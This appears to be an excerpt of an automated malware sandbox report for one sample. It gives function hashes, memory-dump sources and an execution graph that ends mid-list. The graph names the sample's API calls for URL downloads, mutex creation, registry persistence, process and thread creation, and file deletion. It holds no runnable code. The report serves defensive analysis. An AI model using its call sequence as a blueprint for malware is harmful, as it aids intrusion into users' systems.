                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                          • Instruction ID: 7eb8f9a5fc6ec17b7ee9e4db3792ed2e6429f3c98be67d6494cf99e70cce43bb
                                                                                          • Opcode Fuzzy Hash: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                          • Instruction Fuzzy Hash: 4F212671904304EFDB05DF94D9C0B26FBA5FB84324F20C66DE8094B2D6C336D846EA61
                                                                                          Function 00F0D01C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                          • Instruction ID: f1e31ac3beaea8961488b4b34d9d73ec3687140c7bdd41c3715c590cc93b1642
                                                                                          • Opcode Fuzzy Hash: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                          • Instruction Fuzzy Hash: 5F21F271604200DFDB14DF54D984B26BBA5EB84324F20C569D84E4B29AC33AD847EA62
                                                                                          Function 00F0D005 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                          • Instruction ID: 6377789f0b8a7a8539b315b6ed8041a93d305d96d2a23cfc59ebb893dba4b59b
                                                                                          • Opcode Fuzzy Hash: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                          • Instruction Fuzzy Hash: D0218E755093808FCB02CF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62
                                                                                          Function 00B6D49B Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713719831.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b6d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                          • Instruction ID: 277c264d526c0671dba51612e21dc55808c089294585e98a15a74b07c1020ff9
                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                          • Instruction Fuzzy Hash: F5110372904240CFCB12CF04D5C4B16BFB1FBA4324F24C1A9D90A0B656C33AD85ACBA2
                                                                                          Function 00F0D1CF Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                          • Instruction ID: 2ada62e0e48008d1d4d8401518d589db13f2cfba2749ecea2603c64e5992a34a
                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                          • Instruction Fuzzy Hash: 9611BB75904280DFCB16CF54C9C4B15FBA1FB84324F24C6AAD8494B696C33AD80AEB61

                                                                                          Non-executed Functions

                                                                                          Function 058BA228 Relevance: .3, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 672405b45a9f32ff667ca96329ba5affa0c58a3049ffc378fddfb1a59473f030
                                                                                          • Instruction ID: 0ef23fb85b92c6374dd2bac4bd879c08821e4ec0d03f6021b392f0e2ba3488b9
                                                                                          • Opcode Fuzzy Hash: 672405b45a9f32ff667ca96329ba5affa0c58a3049ffc378fddfb1a59473f030
                                                                                          • Instruction Fuzzy Hash: AEE10774E002198FDB14DFA9D5809AEFBF2BF89304F248169E814AB356DB74AD41CF61
                                                                                          Function 058BB0C8 Relevance: .2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdad1b3e14c05be23b000bbc99ce2abdef3b9edadc37de5c408b844f3c26e3b4
                                                                                          • Instruction ID: 02d26503970e51793ee519b729237052151911da7794fa5cda74cfed49cc8a68
                                                                                          • Opcode Fuzzy Hash: cdad1b3e14c05be23b000bbc99ce2abdef3b9edadc37de5c408b844f3c26e3b4
                                                                                          • Instruction Fuzzy Hash: 69717C74E012189FDB04DFAAC5849DEFBF2BF88300F14D166E819AB315DB74A942CB50
                                                                                          Function 058BB0B8 Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1203297b43df1783e0aae3b594115d290833597c0f193d940e330de49cdca38
                                                                                          • Instruction ID: d7f7397d4adc505a524fd95189f694142d42a4db20802eba9b598a4ed6b09abd
                                                                                          • Opcode Fuzzy Hash: f1203297b43df1783e0aae3b594115d290833597c0f193d940e330de49cdca38
                                                                                          • Instruction Fuzzy Hash: 68517375E006189FDB08DFAAC9446DEFBF2BF88310F14C06AE819AB354DB7459468F50

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:5.1%
                                                                                          Total number of Nodes:1321
                                                                                          Total number of Limit Nodes:60
                                                                                          execution_graph 46584 415d41 46599 41b411 46584->46599 46586 415d4a 46610 4020f6 46586->46610 46590 415d65 46591 4170c4 46590->46591 46617 401fd8 46590->46617 46620 401e8d 46591->46620 46595 401fd8 11 API calls 46596 4170d9 46595->46596 46597 401fd8 11 API calls 46596->46597 46598 4170e5 46597->46598 46626 4020df 46599->46626 46604 41b456 InternetReadFile 46607 41b479 46604->46607 46606 41b4a6 InternetCloseHandle InternetCloseHandle 46608 41b4b8 46606->46608 46607->46604 46607->46606 46609 401fd8 11 API calls 46607->46609 46637 4020b7 46607->46637 46608->46586 46609->46607 46611 40210c 46610->46611 46612 4023ce 11 API calls 46611->46612 46613 402126 46612->46613 46614 402569 28 API calls 46613->46614 46615 402134 46614->46615 46616 404aa1 61 API calls ctype 46615->46616 46616->46590 46618 4023ce 11 API calls 46617->46618 46619 401fe1 46618->46619 46619->46591 46621 402163 46620->46621 46625 40219f 46621->46625 46704 402730 11 API calls 46621->46704 46623 402184 46705 402712 11 API calls std::_Deallocate 46623->46705 46625->46595 46627 4020e7 46626->46627 46643 4023ce 46627->46643 46629 4020f2 46630 43bda0 46629->46630 46635 4461b8 __Getctype 46630->46635 46631 4461f6 46659 44062d 20 API calls __dosmaperr 46631->46659 46632 4461e1 RtlAllocateHeap 46634 41b42f InternetOpenW InternetOpenUrlW 46632->46634 46632->46635 46634->46604 46635->46631 46635->46632 46658 443001 7 API calls 2 library calls 46635->46658 46638 4020bf 46637->46638 46639 4023ce 11 API calls 46638->46639 46640 4020ca 46639->46640 46660 40250a 46640->46660 46642 4020d9 46642->46607 46644 402428 46643->46644 46645 4023d8 46643->46645 46644->46629 46645->46644 46647 4027a7 46645->46647 46648 402e21 46647->46648 46651 4016b4 46648->46651 46650 402e30 46650->46644 46652 4016c6 46651->46652 46653 4016cb 46651->46653 46657 43bd68 11 API calls _abort 46652->46657 46653->46652 46654 4016f3 46653->46654 46654->46650 46656 43bd67 46657->46656 46658->46635 46659->46634 46661 40251a 46660->46661 46662 402520 46661->46662 46663 402535 46661->46663 46667 402569 46662->46667 46677 4028e8 46663->46677 46666 402533 46666->46642 46688 402888 46667->46688 46669 40257d 46670 402592 46669->46670 46671 4025a7 46669->46671 46693 402a34 22 API calls 46670->46693 46673 4028e8 28 API calls 46671->46673 46676 4025a5 46673->46676 46674 40259b 46694 4029da 22 API calls 46674->46694 46676->46666 46678 4028f1 46677->46678 46679 402953 46678->46679 46680 4028fb 46678->46680 46702 4028a4 22 API calls 46679->46702 46683 402904 46680->46683 46684 402917 46680->46684 46696 402cae 46683->46696 46686 402915 46684->46686 46687 4023ce 11 API calls 46684->46687 46686->46666 46687->46686 46689 402890 46688->46689 46690 402898 46689->46690 46695 402ca3 22 API calls 46689->46695 46690->46669 46693->46674 46694->46676 46697 402cb8 __EH_prolog 46696->46697 46703 402e54 22 API calls 46697->46703 46699 402d24 46700 4023ce 11 API calls 46699->46700 46701 402d92 46700->46701 46701->46686 46703->46699 46704->46623 46705->46625 46706 426a77 46707 426a8c 46706->46707 46713 426b1e 46706->46713 46708 426bd5 46707->46708 46709 426ad9 46707->46709 46710 426b4e 46707->46710 46711 426bae 46707->46711 46707->46713 46716 426b83 46707->46716 46719 426b0e 46707->46719 46734 424f6e 49 API calls ctype 46707->46734 46708->46713 46739 4261e6 28 API calls 46708->46739 46709->46713 46709->46719 46735 41fbfd 52 API calls 46709->46735 46710->46713 46710->46716 46737 41fbfd 52 API calls 46710->46737 46711->46708 46711->46713 46722 425b72 46711->46722 46716->46711 46738 425781 21 API calls 46716->46738 46719->46710 46719->46713 46736 424f6e 49 API calls ctype 46719->46736 46723 425b91 ___scrt_fastfail 46722->46723 46725 425ba0 46723->46725 46729 425bc5 46723->46729 46740 41ec4c 21 API calls 46723->46740 46725->46729 46733 425ba5 46725->46733 46741 420669 46 API calls 46725->46741 46728 425bae 46728->46729 46744 424d96 21 API calls 2 library calls 46728->46744 46729->46708 46731 425c48 46731->46729 46742 432f55 21 API calls ___std_exception_copy 46731->46742 46733->46728 46733->46729 46743 41daf0 49 API calls 46733->46743 46734->46709 46735->46709 46736->46710 46737->46710 46738->46711 46739->46713 46740->46725 46741->46731 46742->46733 46743->46728 46744->46729 46745 43bea8 46748 43beb4 _swprintf ___FrameUnwindToState 46745->46748 46746 43bec2 46761 44062d 20 API calls __dosmaperr 46746->46761 46748->46746 46749 43beec 46748->46749 46756 445909 EnterCriticalSection 46749->46756 46751 43bec7 pre_c_initialization ___FrameUnwindToState 46752 43bef7 46757 43bf98 46752->46757 46756->46752 46758 43bfa6 46757->46758 46758->46758 46760 43bf02 46758->46760 46763 4497ec 37 API calls 2 library calls 46758->46763 46762 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 46760->46762 46761->46751 46762->46751 46763->46758 46764 434918 46765 434924 ___FrameUnwindToState 46764->46765 46791 434627 46765->46791 46767 43492b 46769 434954 46767->46769 47089 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46767->47089 46774 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46769->46774 47090 4442d2 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46769->47090 46771 43496d 46773 434973 ___FrameUnwindToState 46771->46773 47091 444276 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46771->47091 46781 4349f3 46774->46781 47092 443487 36 API calls 5 library calls 46774->47092 46802 434ba5 46781->46802 46784 434a15 46785 434a1f 46784->46785 47094 4434bf 28 API calls _abort 46784->47094 46787 434a28 46785->46787 47095 443462 28 API calls _abort 46785->47095 47096 43479e 13 API calls 2 library calls 46787->47096 46790 434a30 46790->46773 46792 434630 46791->46792 47097 434cb6 IsProcessorFeaturePresent 46792->47097 46794 43463c 47098 438fb1 10 API calls 4 library calls 46794->47098 46796 434641 46801 434645 46796->46801 47099 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46796->47099 46798 43464e 46799 43465c 46798->46799 47100 438fda 8 API calls 3 library calls 46798->47100 46799->46767 46801->46767 47101 436f10 46802->47101 46805 4349f9 46806 444223 46805->46806 47103 44f0d9 46806->47103 46808 44422c 46810 434a02 46808->46810 47107 446895 36 API calls 46808->47107 46811 40ea00 46810->46811 47109 41cbe1 LoadLibraryA GetProcAddress 46811->47109 46813 40ea1c GetModuleFileNameW 47114 40f3fe 46813->47114 46815 40ea38 46816 4020f6 28 API calls 46815->46816 46817 40ea47 46816->46817 46818 4020f6 28 API calls 46817->46818 46819 40ea56 46818->46819 47129 41beac 46819->47129 46823 40ea68 46824 401e8d 11 API calls 46823->46824 46825 40ea71 46824->46825 46826 40ea84 46825->46826 46827 40eace 46825->46827 47419 40fbee 97 API calls 46826->47419 47155 401e65 46827->47155 46830 40eade 46834 401e65 22 API calls 46830->46834 46831 40ea96 46832 401e65 22 API calls 46831->46832 46833 40eaa2 46832->46833 47420 410f72 36 API calls __EH_prolog 46833->47420 46835 40eafd 46834->46835 47160 40531e 46835->47160 46838 40eab4 47421 40fb9f 78 API calls 46838->47421 46839 40eb0c 47165 406383 46839->47165 46843 40eabd 47422 40f3eb 71 API calls 46843->47422 46847 401fd8 11 API calls 46848 40eb2d 46847->46848 46850 401fd8 11 API calls 46848->46850 46849 401fd8 11 API calls 46851 40ef36 46849->46851 46852 40eb36 46850->46852 47093 443396 GetModuleHandleW 46851->47093 46853 401e65 22 API calls 46852->46853 46854 40eb3f 46853->46854 47179 401fc0 46854->47179 46856 40eb4a 46857 401e65 22 API calls 46856->46857 46858 40eb63 46857->46858 46859 401e65 22 API calls 46858->46859 46860 40eb7e 46859->46860 46861 40ebe9 46860->46861 47423 406c59 46860->47423 46862 401e65 22 API calls 46861->46862 46867 40ebf6 46862->46867 46864 40ebab 46865 401fe2 28 API calls 46864->46865 46866 40ebb7 46865->46866 46869 401fd8 11 API calls 46866->46869 46868 40ec3d 46867->46868 46874 413584 3 API calls 46867->46874 47183 40d0a4 46868->47183 46871 40ebc0 46869->46871 47428 413584 RegOpenKeyExA 46871->47428 46872 40ec43 46873 40eac6 46872->46873 47186 41b354 46872->47186 46873->46849 46880 40ec21 46874->46880 46878 40f38a 47511 4139e4 30 API calls 46878->47511 46879 40ec5e 46881 40ecb1 46879->46881 47203 407751 46879->47203 46880->46868 47431 4139e4 30 API calls 46880->47431 46884 401e65 22 API calls 46881->46884 46886 40ecba 46884->46886 46895 40ecc6 46886->46895 46896 40eccb 46886->46896 46888 40f3a0 47512 4124b0 65 API calls ___scrt_fastfail 46888->47512 46889 40ec87 46893 401e65 22 API calls 46889->46893 46890 40ec7d 47432 407773 30 API calls 46890->47432 46905 40ec90 46893->46905 46894 40f3aa 46898 41bcef 28 API calls 46894->46898 47435 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46895->47435 46901 401e65 22 API calls 46896->46901 46897 40ec82 47433 40729b 98 API calls 46897->47433 46902 40f3ba 46898->46902 46903 40ecd4 46901->46903 47312 413a5e RegOpenKeyExW 46902->47312 47207 41bcef 46903->47207 46905->46881 46909 40ecac 46905->46909 46906 40ecdf 47211 401f13 46906->47211 47434 40729b 98 API calls 46909->47434 46913 401f09 11 API calls 46915 40f3d7 46913->46915 46916 401f09 11 API calls 46915->46916 46918 40f3e0 46916->46918 47315 40dd7d 46918->47315 46919 401e65 22 API calls 46921 40ecfc 46919->46921 46924 401e65 22 API calls 46921->46924 46926 40ed16 46924->46926 46925 40f3ea 46927 401e65 22 API calls 46926->46927 46928 40ed30 46927->46928 46929 401e65 22 API calls 46928->46929 46930 40ed49 46929->46930 46931 40edb6 46930->46931 46933 401e65 22 API calls 46930->46933 46932 40edc5 46931->46932 46939 40ef41 ___scrt_fastfail 46931->46939 46934 40edce 46932->46934 46962 40ee4a ___scrt_fastfail 46932->46962 46937 40ed5e _wcslen 46933->46937 46935 401e65 22 API calls 46934->46935 46936 40edd7 46935->46936 46938 401e65 22 API calls 46936->46938 46937->46931 46940 401e65 22 API calls 46937->46940 46941 40ede9 46938->46941 47496 413733 RegOpenKeyExA 46939->47496 46942 40ed79 46940->46942 46944 401e65 22 API calls 46941->46944 46946 401e65 22 API calls 46942->46946 46945 40edfb 46944->46945 46949 401e65 22 API calls 46945->46949 46947 40ed8e 46946->46947 47436 40da6f 46947->47436 46948 40ef8c 46950 401e65 22 API calls 46948->46950 46951 40ee24 46949->46951 46952 40efb1 46950->46952 46957 401e65 22 API calls 46951->46957 47233 402093 46952->47233 46955 401f13 28 API calls 46956 40edad 46955->46956 46959 401f09 11 API calls 46956->46959 46960 40ee35 46957->46960 46959->46931 47494 40ce34 46 API calls _wcslen 46960->47494 46961 40efc3 47239 4137aa RegCreateKeyA 46961->47239 47223 413982 46962->47223 46967 40eede ctype 46971 401e65 22 API calls 46967->46971 46968 40ee45 46968->46962 46969 401e65 22 API calls 46970 40efe5 46969->46970 47245 43bb2c 46970->47245 46972 40eef5 46971->46972 46972->46948 46976 40ef09 46972->46976 46975 40effc 47499 41ce2c 88 API calls ___scrt_fastfail 46975->47499 46978 401e65 22 API calls 46976->46978 46977 40f01f 46983 402093 28 API calls 46977->46983 46980 40ef12 46978->46980 46981 41bcef 28 API calls 46980->46981 46985 40ef1e 46981->46985 46982 40f003 CreateThread 46982->46977 48222 41d4ee 10 API calls 46982->48222 46984 40f034 46983->46984 46986 402093 28 API calls 46984->46986 47495 40f4af 107 API calls 46985->47495 46988 40f043 46986->46988 47249 41b580 46988->47249 46989 40ef23 46989->46948 46991 40ef2a 46989->46991 46991->46873 46993 401e65 22 API calls 46994 40f054 46993->46994 46995 401e65 22 API calls 46994->46995 46996 40f066 46995->46996 46997 401e65 22 API calls 46996->46997 46998 40f086 46997->46998 46999 43bb2c 40 API calls 46998->46999 47000 40f093 46999->47000 47001 401e65 22 API calls 47000->47001 47002 40f09e 47001->47002 47003 401e65 22 API calls 47002->47003 47004 40f0af 47003->47004 47005 401e65 22 API calls 47004->47005 47006 40f0c4 47005->47006 47007 401e65 22 API calls 47006->47007 47008 40f0d5 47007->47008 47009 40f0dc StrToIntA 47008->47009 47273 409e1f 47009->47273 47012 401e65 22 API calls 47013 40f0f7 47012->47013 47014 40f103 47013->47014 47015 40f13c 47013->47015 47500 43455e 47014->47500 47017 401e65 22 API calls 47015->47017 47019 40f14c 47017->47019 47022 40f194 47019->47022 47023 40f158 47019->47023 47020 401e65 22 API calls 47021 40f11f 47020->47021 47024 40f126 CreateThread 47021->47024 47026 401e65 22 API calls 47022->47026 47025 43455e new 22 API calls 47023->47025 47024->47015 48219 41a045 113 API calls __EH_prolog 47024->48219 47027 40f161 47025->47027 47028 40f19d 47026->47028 47029 401e65 22 API calls 47027->47029 47031 40f207 47028->47031 47032 40f1a9 47028->47032 47030 40f173 47029->47030 47035 40f17a CreateThread 47030->47035 47033 401e65 22 API calls 47031->47033 47034 401e65 22 API calls 47032->47034 47036 40f210 47033->47036 47037 40f1b9 47034->47037 47035->47022 48224 41a045 113 API calls __EH_prolog 47035->48224 47038 40f255 47036->47038 47039 40f21c 47036->47039 47040 401e65 22 API calls 47037->47040 47298 41b69e GetComputerNameExW GetUserNameW 47038->47298 47042 401e65 22 API calls 47039->47042 47043 40f1ce 47040->47043 47045 40f225 47042->47045 47507 40da23 32 API calls 47043->47507 47050 401e65 22 API calls 47045->47050 47046 401f13 28 API calls 47047 40f269 47046->47047 47049 401f09 11 API calls 47047->47049 47052 40f272 47049->47052 47053 40f23a 47050->47053 47051 40f1e1 47054 401f13 28 API calls 47051->47054 47055 40f27b SetProcessDEPPolicy 47052->47055 47056 40f27e CreateThread 47052->47056 47064 43bb2c 40 API calls 47053->47064 47057 40f1ed 47054->47057 47055->47056 47058 40f293 CreateThread 47056->47058 47059 40f29f 47056->47059 48192 40f7e2 47056->48192 47060 401f09 11 API calls 47057->47060 47058->47059 48220 412132 139 API calls 47058->48220 47062 40f2b4 47059->47062 47063 40f2a8 CreateThread 47059->47063 47061 40f1f6 CreateThread 47060->47061 47061->47031 48221 401be9 50 API calls 47061->48221 47066 40f307 47062->47066 47068 402093 28 API calls 47062->47068 47063->47062 48223 412716 38 API calls ___scrt_fastfail 47063->48223 47065 40f247 47064->47065 47508 40c19d 7 API calls 47065->47508 47309 41353a RegOpenKeyExA 47066->47309 47069 40f2d7 47068->47069 47509 4052fd 28 API calls 47069->47509 47074 40f328 47076 41bcef 28 API calls 47074->47076 47078 40f338 47076->47078 47510 413656 31 API calls 47078->47510 47083 40f34e 47084 401f09 11 API calls 47083->47084 47087 40f359 47084->47087 47085 40f381 DeleteFileW 47086 40f388 47085->47086 47085->47087 47086->46894 47087->46894 47087->47085 47088 40f36f Sleep 47087->47088 47088->47087 47089->46767 47090->46771 47091->46774 47092->46781 47093->46784 47094->46785 47095->46787 47096->46790 47097->46794 47098->46796 47099->46798 47100->46801 47102 434bb8 GetStartupInfoW 47101->47102 47102->46805 47104 44f0eb 47103->47104 47105 44f0e2 47103->47105 47104->46808 47108 44efd8 49 API calls 5 library calls 47105->47108 47107->46808 47108->47104 47110 41cc20 LoadLibraryA GetProcAddress 47109->47110 47111 41cc10 GetModuleHandleA GetProcAddress 47109->47111 47112 41cc49 44 API calls 47110->47112 47113 41cc39 LoadLibraryA GetProcAddress 47110->47113 47111->47110 47112->46813 47113->47112 47513 41b539 FindResourceA 47114->47513 47117 43bda0 ___std_exception_copy 21 API calls 47118 40f428 ctype 47117->47118 47119 4020b7 28 API calls 47118->47119 47120 40f443 47119->47120 47121 401fe2 28 API calls 47120->47121 47122 40f44e 47121->47122 47123 401fd8 11 API calls 47122->47123 47124 40f457 47123->47124 47125 43bda0 ___std_exception_copy 21 API calls 47124->47125 47126 40f468 ctype 47125->47126 47516 406e13 47126->47516 47128 40f49b 47128->46815 47130 4020df 11 API calls 47129->47130 47131 41bebf 47130->47131 47134 41bf31 47131->47134 47142 401fe2 28 API calls 47131->47142 47146 401fd8 11 API calls 47131->47146 47150 41bf2f 47131->47150 47519 4041a2 47131->47519 47522 41cec5 28 API calls 47131->47522 47132 401fd8 11 API calls 47133 41bf61 47132->47133 47135 401fd8 11 API calls 47133->47135 47136 4041a2 28 API calls 47134->47136 47138 41bf69 47135->47138 47139 41bf3d 47136->47139 47140 401fd8 11 API calls 47138->47140 47141 401fe2 28 API calls 47139->47141 47143 40ea5f 47140->47143 47144 41bf46 47141->47144 47142->47131 47151 40fb52 47143->47151 47145 401fd8 11 API calls 47144->47145 47147 41bf4e 47145->47147 47146->47131 47523 41cec5 28 API calls 47147->47523 47150->47132 47152 40fb5e 47151->47152 47154 40fb65 47151->47154 47530 402163 11 API calls 47152->47530 47154->46823 47157 401e6d 47155->47157 47156 401e75 47156->46830 47157->47156 47531 402158 22 API calls 47157->47531 47161 4020df 11 API calls 47160->47161 47162 40532a 47161->47162 47532 4032a0 47162->47532 47164 405346 47164->46839 47536 4051ef 47165->47536 47167 406391 47540 402055 47167->47540 47170 401fe2 47171 401ff1 47170->47171 47178 402039 47170->47178 47172 4023ce 11 API calls 47171->47172 47173 401ffa 47172->47173 47174 40203c 47173->47174 47175 402015 47173->47175 47176 40267a 11 API calls 47174->47176 47572 403098 28 API calls 47175->47572 47176->47178 47178->46847 47180 401fd2 47179->47180 47181 401fc9 47179->47181 47180->46856 47573 4025e0 28 API calls 47181->47573 47574 401fab 47183->47574 47185 40d0ae CreateMutexA GetLastError 47185->46872 47575 41c048 47186->47575 47191 401fe2 28 API calls 47192 41b390 47191->47192 47193 401fd8 11 API calls 47192->47193 47194 41b398 47193->47194 47195 4135e1 31 API calls 47194->47195 47197 41b3ee 47194->47197 47196 41b3c1 47195->47196 47198 41b3cc StrToIntA 47196->47198 47197->46879 47199 41b3e3 47198->47199 47200 41b3da 47198->47200 47202 401fd8 11 API calls 47199->47202 47584 41cffa 22 API calls 47200->47584 47202->47197 47204 407765 47203->47204 47205 413584 3 API calls 47204->47205 47206 40776c 47205->47206 47206->46889 47206->46890 47208 41bd03 47207->47208 47585 40b93f 47208->47585 47210 41bd0b 47210->46906 47212 401f22 47211->47212 47219 401f6a 47211->47219 47213 402252 11 API calls 47212->47213 47214 401f2b 47213->47214 47215 401f6d 47214->47215 47216 401f46 47214->47216 47618 402336 47215->47618 47617 40305c 28 API calls 47216->47617 47220 401f09 47219->47220 47221 402252 11 API calls 47220->47221 47222 401f12 47221->47222 47222->46919 47224 4139a0 47223->47224 47225 406e13 28 API calls 47224->47225 47226 4139b5 47225->47226 47227 4020f6 28 API calls 47226->47227 47228 4139c5 47227->47228 47229 4137aa 14 API calls 47228->47229 47230 4139cf 47229->47230 47231 401fd8 11 API calls 47230->47231 47232 4139dc 47231->47232 47232->46967 47234 40209b 47233->47234 47235 4023ce 11 API calls 47234->47235 47236 4020a6 47235->47236 47622 4024ed 47236->47622 47240 4137fa 47239->47240 47242 4137c3 47239->47242 47241 401fd8 11 API calls 47240->47241 47243 40efd9 47241->47243 47244 4137d5 RegSetValueExA RegCloseKey 47242->47244 47243->46969 47244->47240 47246 43bb45 _swprintf 47245->47246 47626 43ae83 47246->47626 47248 40eff2 47248->46975 47248->46977 47250 41b631 47249->47250 47251 41b596 GetLocalTime 47249->47251 47253 401fd8 11 API calls 47250->47253 47252 40531e 28 API calls 47251->47252 47254 41b5d8 47252->47254 47255 41b639 47253->47255 47256 406383 28 API calls 47254->47256 47257 401fd8 11 API calls 47255->47257 47258 41b5e4 47256->47258 47259 40f048 47257->47259 47654 402f10 47258->47654 47259->46993 47262 406383 28 API calls 47263 41b5fc 47262->47263 47659 40723b 77 API calls 47263->47659 47265 41b60a 47266 401fd8 11 API calls 47265->47266 47267 41b616 47266->47267 47268 401fd8 11 API calls 47267->47268 47269 41b61f 47268->47269 47270 401fd8 11 API calls 47269->47270 47271 41b628 47270->47271 47272 401fd8 11 API calls 47271->47272 47272->47250 47274 409e3d _wcslen 47273->47274 47275 409e48 47274->47275 47276 409e5f 47274->47276 47277 40da6f 32 API calls 47275->47277 47278 40da6f 32 API calls 47276->47278 47279 409e50 47277->47279 47280 409e67 47278->47280 47281 401f13 28 API calls 47279->47281 47282 401f13 28 API calls 47280->47282 47297 409e5a 47281->47297 47283 409e75 47282->47283 47284 401f09 11 API calls 47283->47284 47286 409e7d 47284->47286 47285 401f09 11 API calls 47287 409eb4 47285->47287 47678 409196 28 API calls 47286->47678 47663 40a144 47287->47663 47290 409e8f 47679 403014 47290->47679 47294 401f13 28 API calls 47295 409ea4 47294->47295 47296 401f09 11 API calls 47295->47296 47296->47297 47297->47285 47731 40417e 47298->47731 47303 403014 28 API calls 47304 41b703 47303->47304 47305 401f09 11 API calls 47304->47305 47306 41b70c 47305->47306 47307 401f09 11 API calls 47306->47307 47308 40f25e 47307->47308 47308->47046 47310 41355b RegQueryValueExA RegCloseKey 47309->47310 47311 40f31f 47309->47311 47310->47311 47311->46918 47311->47074 47313 40f3cd 47312->47313 47314 413a7a RegDeleteValueW 47312->47314 47313->46913 47314->47313 47316 40dd96 47315->47316 47317 41353a 3 API calls 47316->47317 47318 40dd9d 47317->47318 47322 40ddbc 47318->47322 47825 401707 47318->47825 47320 40ddaa 47828 4138b2 RegCreateKeyA 47320->47828 47323 414f65 47322->47323 47324 4020df 11 API calls 47323->47324 47325 414f79 47324->47325 47842 41b944 47325->47842 47328 4020df 11 API calls 47329 414f8f 47328->47329 47330 401e65 22 API calls 47329->47330 47331 414f9d 47330->47331 47332 43bb2c 40 API calls 47331->47332 47333 414faa 47332->47333 47334 414fbc 47333->47334 47335 414faf Sleep 47333->47335 47336 402093 28 API calls 47334->47336 47335->47334 47337 414fcb 47336->47337 47338 401e65 22 API calls 47337->47338 47339 414fd4 47338->47339 47340 4020f6 28 API calls 47339->47340 47341 414fdf 47340->47341 47342 41beac 28 API calls 47341->47342 47343 